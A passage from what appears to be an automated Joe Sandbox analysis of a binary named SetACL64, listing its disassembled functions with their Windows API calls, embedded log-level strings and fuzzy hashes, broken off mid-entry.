                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CriticalLeaveSection
                                        • String ID: %s$CRTCL,
                                        • API String ID: 3988221542-3126492506
                                        • Opcode ID: 984058a0684c820fee82438c3696b1bf70c79d27525573db99da59e1e00725f3
                                        • Instruction ID: c1336558399e9978695b06de419bb5e68287b28f16c2204c8023a805ffc7f616
                                        • Opcode Fuzzy Hash: 984058a0684c820fee82438c3696b1bf70c79d27525573db99da59e1e00725f3
                                        • Instruction Fuzzy Hash: DB218EE1A28A82C0EA14DB15D5593B92762FF40B84F41503DCA0D8B7E6DF6EED89C360
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CriticalLeaveSection
                                        • String ID: %s$WARN ,
                                        • API String ID: 3988221542-3785767073
                                        • Opcode ID: 8215001489b263a33ae11ef63e8d66250099090301e5055772b76e4d05ae3108
                                        • Instruction ID: 94ec21e71a35c75c73d903f0950ca0891fd00adfc18471546a05abaf0d527c39
                                        • Opcode Fuzzy Hash: 8215001489b263a33ae11ef63e8d66250099090301e5055772b76e4d05ae3108
                                        • Instruction Fuzzy Hash: 9E218EE1A28A82C0EA14DB15D5593B92762FF40B84F41503DCA0D8B7E6DF6EED89C360
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CriticalLeaveSection
                                        • String ID: %s$ERROR,
                                        • API String ID: 3988221542-2486372128
                                        • Opcode ID: fb135519248cd7f04a09e43bd04ed0a4edcf3838c157fd2ce0e7584ffd020449
                                        • Instruction ID: 6f97fc8dcd2a94427c30544f1ea6cf847d3ce5060d0428e265c58a7bdcc3ba64
                                        • Opcode Fuzzy Hash: fb135519248cd7f04a09e43bd04ed0a4edcf3838c157fd2ce0e7584ffd020449
                                        • Instruction Fuzzy Hash: 3C218EE1A28A82C0FA14DB15D5593B92762FF40B84F41503DCA0D8B7E6DF6EED89C360
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CriticalLeaveSection
                                        • String ID: %s$NONE ,
                                        • API String ID: 3988221542-1825952341
                                        • Opcode ID: 4f68964d466b64e016808783c6b282a6dc1bb05c72728e6bf54c9f41982cb742
                                        • Instruction ID: a39bc4c2b0b0eec86f14d6d8857a5336f15b75a23feaa9da804d6cfe7f99d67d
                                        • Opcode Fuzzy Hash: 4f68964d466b64e016808783c6b282a6dc1bb05c72728e6bf54c9f41982cb742
                                        • Instruction Fuzzy Hash: 0A215EE2A28A82C0EA14DB55D5593B92762FF40B84F415039CA0D8B7E6DF7EED85C360
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CriticalLeaveSection
                                        • String ID: %s$DEBUG,
                                        • API String ID: 3988221542-4222748730
                                        • Opcode ID: 5578c2daa3c5bd8fe1d9a90197abb313d44aa39db796cfcd1e657dbf23e1760e
                                        • Instruction ID: c896ced5c6946f9d38d80ba34c12e247d80a2698bd2acdc86c964ed8d9fd544f
                                        • Opcode Fuzzy Hash: 5578c2daa3c5bd8fe1d9a90197abb313d44aa39db796cfcd1e657dbf23e1760e
                                        • Instruction Fuzzy Hash: AD215EE1A28A82C0EA14DB55D5593B92762FF40B84F415039CA0D8B7E6DF7EED85C360
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CriticalLeaveSection
                                        • String ID: %s$INFO ,
                                        • API String ID: 3988221542-2224252516
                                        • Opcode ID: a4deadb17dcfd970735e71189be630700e0c81ec6e5d9d4b59823830e63e97e8
                                        • Instruction ID: 7bbc6948b846f3cf8d721f176df0d063582e63bbddc437c88f266e96b764c0b2
                                        • Opcode Fuzzy Hash: a4deadb17dcfd970735e71189be630700e0c81ec6e5d9d4b59823830e63e97e8
                                        • Instruction Fuzzy Hash: 27215EE1A28A82C0EA14DB55D5593B92762FF40B84F415039CA0D8B7E6DF7EED85C360
                                        APIs
                                          • Part of subcall function 00007FF686873FE0: GetLastError.KERNEL32(?,?,0000F23FCA72FB90,00007FF68686E201,?,?,?,?,00007FF68687BCFA,?,?,00000000,00007FF68687D70B,?,?,?), ref: 00007FF686873FEF
                                          • Part of subcall function 00007FF686873FE0: SetLastError.KERNEL32(?,?,0000F23FCA72FB90,00007FF68686E201,?,?,?,?,00007FF68687BCFA,?,?,00000000,00007FF68687D70B,?,?,?), ref: 00007FF68687408D
                                        • CloseHandle.KERNEL32(?,?,00000000,00007FF68686E709,?,?,?,?,00007FF68683EA35), ref: 00007FF68686E5A3
                                        • FreeLibraryAndExitThread.KERNELBASE(?,?,00000000,00007FF68686E709,?,?,?,?,00007FF68683EA35), ref: 00007FF68686E5B9
                                          • Part of subcall function 00007FF686878230: try_get_function.LIBVCRUNTIME ref: 00007FF68687824E
                                        • ExitThread.KERNEL32 ref: 00007FF68686E5C2
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: ErrorExitLastThread$CloseFreeHandleLibrarytry_get_function
                                        • String ID:
                                        • API String ID: 1393601959-0
                                        • Opcode ID: 1314125dbc08a1527b8b45cc3709738042c2a60f08861b77101480d1199f923b
                                        • Instruction ID: dceb4f7df0669c43fef2206f225f772f35979a768d0fad60ad255de6074ecd47
                                        • Opcode Fuzzy Hash: 1314125dbc08a1527b8b45cc3709738042c2a60f08861b77101480d1199f923b
                                        • Instruction Fuzzy Hash: 67F03CA1A18A86C2EE145B20905C27C22A5BF84B74F184B3DD73C822E5EF2ADC45C360
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: cc89c5ebab4446ecbbafaabbd929ad7d895e51dc1ae703ba52595f57cde5059a
                                        • Instruction ID: 59e18a4ca02535f3c5dba18bf09c991be50c26cd87ed0e2f0125d46d8ed3415a
                                        • Opcode Fuzzy Hash: cc89c5ebab4446ecbbafaabbd929ad7d895e51dc1ae703ba52595f57cde5059a
                                        • Instruction Fuzzy Hash: CBE0B860B54705C7E654672598956792262BFC8741F10943DC44E86373DD3FEC55C321
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn
                                        • String ID: StartLoggerThreadProc: arg0==NULL
                                        • API String ID: 3668304517-2114133805
                                        • Opcode ID: 701121a5653b672ea9e41aef133949d4364fef49f6e0b0740102384dee600f90
                                        • Instruction ID: 7edb4b9a5cd49bb666634ed739816f073caee6d0955240fc4cf68ce4c92b7050
                                        • Opcode Fuzzy Hash: 701121a5653b672ea9e41aef133949d4364fef49f6e0b0740102384dee600f90
                                        • Instruction Fuzzy Hash: 624131A2714686C2EF049F29E59D36D6362FF40B88F90443ADB4D4766ADF6ED880C354
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: try_get_function
                                        • String ID: AppPolicyGetThreadInitializationType
                                        • API String ID: 2742660187-3350320272
                                        • Opcode ID: e941d50e62de51ed76b533e4f2f07d996791261573e730f1a39f5aef81969e66
                                        • Instruction ID: 3d5049713480d79797d430cb7c001c16d8387c7092c3090dead06f373b8f59ba
                                        • Opcode Fuzzy Hash: e941d50e62de51ed76b533e4f2f07d996791261573e730f1a39f5aef81969e66
                                        • Instruction Fuzzy Hash: 9DE04FD1F0A906D2FA0547A1A8002B01211BF5C375E48533ADA3D863E0DF3D9D99C7A0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: FileHandleType
                                        • String ID:
                                        • API String ID: 3000768030-0
                                        • Opcode ID: 41b2a8049982c7b62960df7333a90929865213e4a10fcc4cea85c37fae35e6e2
                                        • Instruction ID: f57ff143fa14e4c43c3edc97beefe5292a639e98ac51d7b5c2769795bae89b82
                                        • Opcode Fuzzy Hash: 41b2a8049982c7b62960df7333a90929865213e4a10fcc4cea85c37fae35e6e2
                                        • Instruction Fuzzy Hash: 6231A8A2B18B46C1D7648B1585902796660FF55BB0F68133DDBAE8B3E0CF3AEC61D311
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: ErrorExitLastThread
                                        • String ID:
                                        • API String ID: 1611280651-0
                                        • Opcode ID: 0a4e96a3b88f839fc0d37f454c2d20bdf8464b58d4c268462bd8fbbd0cbad1db
                                        • Instruction ID: eee4f88e28d12b9f033adee4818bec0d59c88257f9bae10bdfff2733100dfb95
                                        • Opcode Fuzzy Hash: 0a4e96a3b88f839fc0d37f454c2d20bdf8464b58d4c268462bd8fbbd0cbad1db
                                        • Instruction Fuzzy Hash: D4F03091B5A746C7EF14AB70945D1BC12A1BF95B10F044438DA0DC23A3EF2EAD44C321
                                        APIs
                                        • TlsFree.KERNELBASE(?,?,?,00007FF6868733F9,?,?,?,00007FF68687371D,?,?,?,?,?,?,00007FF686872F93), ref: 00007FF686873645
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: Free
                                        • String ID:
                                        • API String ID: 3978063606-0
                                        • Opcode ID: 02647a6482190b5c7ac84f0063ab76dd3e52f7ffb406aea2a6a991e3af237db9
                                        • Instruction ID: b8b61ec74d821a87000d217d790c73e0836dc1d416991b08099c6faeab6b2472
                                        • Opcode Fuzzy Hash: 02647a6482190b5c7ac84f0063ab76dd3e52f7ffb406aea2a6a991e3af237db9
                                        • Instruction Fuzzy Hash: F7318A62B04B45C2AA108F16E49016973A0BB58FE4F58963ADF6D473A4DF3ED892C341
                                        APIs
                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF68686E258
                                          • Part of subcall function 00007FF68686892C: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6868688D9), ref: 00007FF686868935
                                          • Part of subcall function 00007FF68686892C: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6868688D9), ref: 00007FF68686895A
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 4036615347-0
                                        • Opcode ID: 01bf2f7c1c0373d22a9fd7fc4837b34006ff1f510dd49b4efdda92cd23d07591
                                        • Instruction ID: bf4db36ab8db133c3625cef79371c971184b857da00d89c3ff60e1485532c1a3
                                        • Opcode Fuzzy Hash: 01bf2f7c1c0373d22a9fd7fc4837b34006ff1f510dd49b4efdda92cd23d07591
                                        • Instruction Fuzzy Hash: A6215EA1A1D753C3FA149B55A51D2396692BF49B90F044538EF5C8BBD6DE3EDC01C320
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: HandleModule$AddressFreeLibraryProc
                                        • String ID:
                                        • API String ID: 3947729631-0
                                        • Opcode ID: 286ab29e5b4e5e8684a2d532cff1b6c2a16fd24655239a0828d2631ae31001b4
                                        • Instruction ID: 94ee3ddd6467598df2a39a9baec7dc7bd2d120d9e6827edde55d2aa933dde64d
                                        • Opcode Fuzzy Hash: 286ab29e5b4e5e8684a2d532cff1b6c2a16fd24655239a0828d2631ae31001b4
                                        • Instruction Fuzzy Hash: DB214C72F04B01CBEB11CF64D4856AD37B0FB44708F44853AD61D82A95DF3AE985CBA1
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 3215553584-0
                                        • Opcode ID: c30b1e064e743196e07e5390d10242aa5ba62166ee02cd7138439e9ec16f8412
                                        • Instruction ID: 2f52407cdd96bf38970160a7579e3ac7f68a84356c3e245f93e19437267f14fa
                                        • Opcode Fuzzy Hash: c30b1e064e743196e07e5390d10242aa5ba62166ee02cd7138439e9ec16f8412
                                        • Instruction Fuzzy Hash: 36116DB2A2CA82C2F3109B54A44416962A6FF44784F45413DD6ADCB796DF3EFC52CB20
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 3215553584-0
                                        • Opcode ID: 722239ba75a1275613d8d5edc4f854a8cebc1af2643a0ced5ac4e3957d6e0898
                                        • Instruction ID: 0ec6077fb622112607799563dc8b4647506713909478994994e2a58229cb843e
                                        • Opcode Fuzzy Hash: 722239ba75a1275613d8d5edc4f854a8cebc1af2643a0ced5ac4e3957d6e0898
                                        • Instruction Fuzzy Hash: 6C1103B2A14B56DDEB10DFA0D4852EC37B8FB0835CF50052AEA4D56B5AEF34C594C3A0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 3215553584-0
                                        • Opcode ID: da481b460c6bc961ce96e17a769fa7a37d49dd1e559ba5bc478610412f584907
                                        • Instruction ID: 0de441a8dc903061041f098eff5ced888e57baab513c5e1a69160b0d1d7128b2
                                        • Opcode Fuzzy Hash: da481b460c6bc961ce96e17a769fa7a37d49dd1e559ba5bc478610412f584907
                                        • Instruction Fuzzy Hash: 4A11DFB2A15F56D9EB10CFA0E8840DC37B8FB1839CB50062AEB5D52B59EF34C5A5C790
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: Startup
                                        • String ID:
                                        • API String ID: 724789610-0
                                        • Opcode ID: e2e48b089702cd41e97987c4de5919cfb4dbdded5e8bd07c72deee5bbe57a52e
                                        • Instruction ID: 5f9963cd24ac20c6b3fda86a4fa83f562118f959bc08396f7abd13f5810a5293
                                        • Opcode Fuzzy Hash: e2e48b089702cd41e97987c4de5919cfb4dbdded5e8bd07c72deee5bbe57a52e
                                        • Instruction Fuzzy Hash: CAF037B1D59586CAFB51E714E8653B533A0FF99744F80043AC64DC62A1DE2FE905CF60
                                        APIs
                                        • HeapAlloc.KERNEL32(?,?,00000000,00007FF68687403D,?,?,0000F23FCA72FB90,00007FF68686E201,?,?,?,?,00007FF68687BCFA,?,?,00000000), ref: 00007FF686875031
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
